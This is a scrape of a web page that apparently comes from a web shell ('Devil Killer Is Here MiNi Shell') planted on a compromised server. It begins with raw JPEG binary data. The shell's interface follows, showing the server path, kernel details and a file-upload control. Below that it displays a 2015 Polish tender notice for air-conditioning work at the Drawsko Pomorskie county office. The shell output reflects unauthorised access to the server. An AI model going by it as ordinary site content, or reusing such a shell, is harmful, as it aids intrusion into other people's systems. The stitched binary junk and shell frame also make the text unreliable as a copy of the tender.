JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151014/272356-N-2015.html

<p class="kh_header"><b>Drawsko Pomorskie: Wykonanie instalacji klimatyzacji w budynku Starostwa Powiatowego w Drawsku Pomorskim</b><br>
<b>Numer ogłoszenia: 272356 - 2015; data zamieszczenia: 14.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Drawski , Plac Elizy Orzeszkowej 3, 78-500 Drawsko Pomorskie, woj. zachodniopomorskie, tel. 94 36 334 64, faks 94 36 307 88.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie instalacji klimatyzacji w budynku Starostwa Powiatowego w Drawsku Pomorskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu instalacji klimatyzacji z zastosowaniem układu składającego się z trzech jednostek zewnętrznych oraz 49 jednostek wewnętrznych w pomieszczeniach budynku urzędu Starostwa Powiatowego w Drawsku Pomorskim. Zamówienie wykonać należy w oparciu o system z jednostkami zewnętrznymi dostosowanymi do pracy przy niskich temperaturach.
Pomieszczenia biurowe.
W celu klimatyzowania pomieszczeń projektuje się zastosowanie naściennych jednostek wewnętrznych systemu o parametrach nie gorszych niż podane w dokumentacji projektowej. Dla pokrycia zapotrzebowania na chłód dla budynku zaprojektowano układ wyposażony w 49 jednostek wewnętrznych oraz trzy jednostki zewnętrzne. Instalację klimatyzacji podzielono na dwa układy. Układ K1 obsługuje poddasze i II piętro, układ K2 obsługuje piwnicę (jedna jednostka wewnętrzna), parter i I piętro. Zgodnie z dokumentacją projektową urządzenia należy tak dobrać, aby z naddatkiem pokryć wymagane zapotrzebowanie na chłód przy założeniu temperatur wewnętrznych pomieszczeń na poziomie 24 stC przy obliczeniowej temperaturze zewnętrznej 30stC. Zastosowane klimatyzatory zapewnić powinny równomierny rozpływ chłodnego powietrza w pomieszczeniach.
Projektowane klimatyzatory winny być wyposażone w bezprzewodowy pilot pozwalający na zmianę nastawy temperatury, zmianę prędkości obrotowej wentylatora lub wyłączenie urządzenia.
Źródłem chłodu projektowanego systemu klimatyzacyjnego będą agregaty skraplające wyposażone w sprężarki inverterowe pozwalające na płynne dopasowanie wydajności urządzeń do aktualnych potrzeb budynku. Układ K1 obsługiwany jest za pomocą jednej jednostki zewnętrznej. Układ K2 obsługiwany jest za pomocą dwóch identycznych jednostek zewnętrznych w tym jedna pracująca jako jednostka nadrzędna. Agregaty skraplające będą ustawione na płytach betonowych przy północnej ścianie budynku. Przy doborze jednostek zewnętrznych uwzględniono przewymiarowanie mocy jednostek wewnętrznych w stosunku do zewnętrznych na poziomie 124proc dla układu K1 oraz 117proc dla układu K2. Założenie to wynika z faktu, iż w momencie planowanego pełnego obciążenia chłodniczego pokoi biurowych strony południowej budynku pozostałe pomieszczenia usytuowane w innej orientacji względem stron świata nie będą generowały zysków ciepła od nasłonecznienia.
Należy dostarczyć urządzenia o parametrach nie gorszych niż urządzenia zaprojektowane. Urządzenia mają pracować w technologii inverterowej na czynnik R410A lub nowszy dopuszczony do stosowania. Projektowany system umożliwia w okresie letnim schładzanie powietrza w klimatyzowanych pomieszczeniach a w okresie zimowym ogrzewanie pomieszczeń za pomocą klimatyzatorów. Ogrzewanie pomieszczeń przy pomocy systemu klimatyzacji ma być możliwy w zakresie temperatur zewnętrznych od -20 do +21stC. Chłodzenie natomiast odbywać się w zakresie -5 do +46stC. Automatyka rozwiązania powinna umożliwiać niezależne sterowanie każdym urządzeniem z osobna poprzez lokalne pokojowe regulatory jednostek wewnętrznych. System powinien umożliwiać także zastosowanie nadrzędnego modułu sterującego, odpowiadającego za centralne sterowania układem klimatyzacji budynku.
W celu połączenia jednostek wewnętrznych z agregatami skraplającymi zaprojektowano piony oraz poziomy instalacji freonowej z rur miedzianych chłodniczych izolowanych izolacją kauczukową np. typu k-flex o grubości min 13mm. Izolację rurociągów prowadzonych na zewnątrz budynku należy zabezpieczyć płaszczem z membrany PCV odpornej na promienie UV. Rozprowadzenie czynnika chłodniczego na poszczególnych kondygnacjach planuje się z rur miedzianych chłodniczych izolowanych kauczukiem syntetycznym. Specyfika systemu wymaga aby na rozgałęzieniach do poszczególnych urządzeń lub na odejściach stosować systemowe trójniki. Wszystkie widoczne przewody należy po zakończeniu prac montażowych i próbach zabudować płytami g-k na konstrukcji systemowej. Dopuszcza się w wybranych pomieszczeniach po konsultacji z Inwestorem zastosowanie zamkniętych koryt kablowych z PCV. 
Rurociągi z rur miedzianych należy mocować do ścian i stropów za pomocą obejm stalowych z wkładka izolacyjną dedykowanych dla przewodów chłodniczych lub uchwyty montować na izolację aby ograniczyć kondensację. Jednostki wewnętrzne klimatyzacji montować do ścian lub zabudować w stropie z zachowaniem wytycznych producenta. Wszelkie materiały montażowe powinny mieć wymagane atesty oraz dopuszczenia do stosowania.
Całość instalacji należy wykonać zgodnie z wymogami Dostawcy urządzeń i pod jego nadzorem.
Sterowanie centralne.
W celu zwiększenia wygody oraz możliwości kontroli nad układami projektuje się zastosowanie sterownika centralnego z polskim menu do centralnego, zaawansowanego zarządzania i sterowania jednostkami osobno dla układu K1 i K2.
Sterownik centralny jest urządzeniem nadrzędnym w stosunku do sterowników indywidualnych co nie pozostaje bez znaczenia w przypadku gdy istotnym jest ograniczenie możliwości wpływu osób niepożądanych na pracę instalacji.
Sterownik ma posiadać następujące funkcje-
-sterowanie centralne
-kolorowy wyświetlacz 5
-proste menu w języku polskim
-wyłączanie grupowe
-możliwość podłączenia sygnałów wejścia/wyjścia
-program pracy tygodniowej
-historię błędów
Sterownik powinien posiadać także funkcję awaryjnego zatrzymania za pośrednictwem zewnętrznego sygnału sterującego.
Ze względu na rozpiętość linii komunikacyjnej w celu zastosowania sterownika centralnego może być konieczne zastosowanie wzmacniacza sygnału UTY-VSGXZ1 lub równoważnego.
W celu właściwej pracy urządzeń doprowadzić energię elektryczną do wszystkich urządzeń wymagających zasilania o specyfikacji zgodnej z załączonymi kartami doborowymi oraz katalogowymi,
-piony instalacji freonowej i skroplin przebiegające w miejscach widocznych należy obudować ściankami z płyt g-k na profilach metalowych - sposób wykonania uzgodnić z Inwestorem,
-w łazienkach, kuchniach na zabudowie z płyt g-k pionów lub po zaklejeniu bruzd ściennych
wkleić płytki glazurowe,
-wykonać cokół o wysokości 20 cm pod jednostki zewnętrzne z wyprofilowanym korytem umożliwiającym odpływ kondensatu z cokołu.
-wykonać ogrodzenie agregatów typu panelowego o wysokości panelu 2430 mm, słupy min 60x60 mm z furtką o szerokości 100 cm, podmurówka ogrodzenia systemowa..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.33.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium
Każdy wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 10 000,00 zł (słownie: dziesięć tysięcy złotych).

2.	Forma wadium
Wadium może być wniesione w następujących formach : 
a)	pieniądzu, 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach  udzielanych  przez  podmioty,  o  których mowa  w  art.  6b  ust.  5  pkt  2  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.) 
W przypadku składania  przez Wykonawcę wadium w  formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.  

3.	Miejsce i sposób wniesienia wadium. 
1)	Wadium  wnoszone  w  pieniądzu  należy  wpłacić  na  rachunek Zamawiającego:
76 1020 2847 0000 1202 0009 6859 z dopiskiem wadium na Wykonanie instalacji klimatyzacji w pomieszczeniach budynku Starostwa Powiatowego w Drawsku Pomorskim. Do  oferty  należy  dołączyć  dokument  potwierdzający wniesienie wadium  przez wykonawcę tzn: oryginał  lub potwierdzoną za zgodność z oryginałem kopię polecenia przelewu na konto Zamawiającego.
2)	Wadium  wnoszone  w  postaci  poręczeń  i  gwarancji  bankowych,  poręczeń  kasy oszczędnościowo - kredytowej lub gwarancji ubezpieczeniowej należy załączyć do oferty w formie  kopii  dokumentu,  a  oryginał  złożyć w  oddzielnej  kopercie  oznaczonej  oryginał wadium, która będzie załączona do oferty (wewnątrz opakowania oferty).

4.	Termin wniesienia wadium  
Wadium należy wnieść przed upływem terminu składania ofert.

5.	Zwrot wadium    
1)	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
2)	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
3)	Jeśli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
4)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca  w odpowiedzi na wezwanie nie złożył dokumentów lub oświadczeń, chyba że udowodni że wynika to z przyczyn nieleżących po jego stronie.
5)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	Zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, zgodnie z załącznikiem nr 4, wykaże, że  wykonał w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na wykonaniu instalacji klimatyzacyjnej, o wartości nie mniejszej niż 200 000,00 złotych brutto, z podaniem rodzaju i wartości, daty i miejsca wykonania wraz z załączeniem z podaniem  rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, zgodnie z załącznikiem nr 5, wykaże, że dysponuje, lub będzie dysponował co najmniej:

1)	co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych,
2)	co najmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi, w specjalności konstrukcyjno -budowlanej oraz przygotowanie zawodowe do kierowania robotami budowlanymi przy zabytkach (kwalifikacje, o których mowa w par. 24 rozporządzenia MKiDN), a także uzyska akceptację Wojewódzkiego Konserwatora Zabytków do kierowania opisanymi robotami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać opłaconą polisę,  a w  przypadku  jej  braku  inny dokument  potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej  
w zakresie prowadzonej działalności gospodarczej na sumę nie mniejszą niż 
300 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja na przedmiot zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy zawarte zostały w Załączniku nr 8 do SIWZ.

Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:

1)	Zmiana terminu realizacji przedmiotu umowy: 
a)	zmiany spowodowane warunkami atmosferycznymi, w szczególności: klęski żywiołowe, warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
b)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: wstrzymanie robót przez Zamawiającego, konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej. 
c)	zmiany będące następstwem działania organów administracji, w szczególności: przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp., odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej. 
d)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące niemożliwością prowadzenia prac. 
e)	w przypadku wystąpienia którejkolwiek z okoliczności wymienionych w lit. a-d) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.

2)	Zmiana sposobu wykonania zamówienia:
a)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych /technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu, 
b)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych, 
c)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
d)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego, 
e)	wykonanie przez podwykonawcę części zamówienia.

Zmiany, o których mowa wyżej w lit a - c) mogą być powiązana z obniżeniem wynagrodzenia na zasadach określonych przez Strony. 

3)	Pozostałe zmiany:
a)	zmiana obowiązującej stawki VAT, jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę lub jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę, 
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy, w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 
c)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami, w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji. 

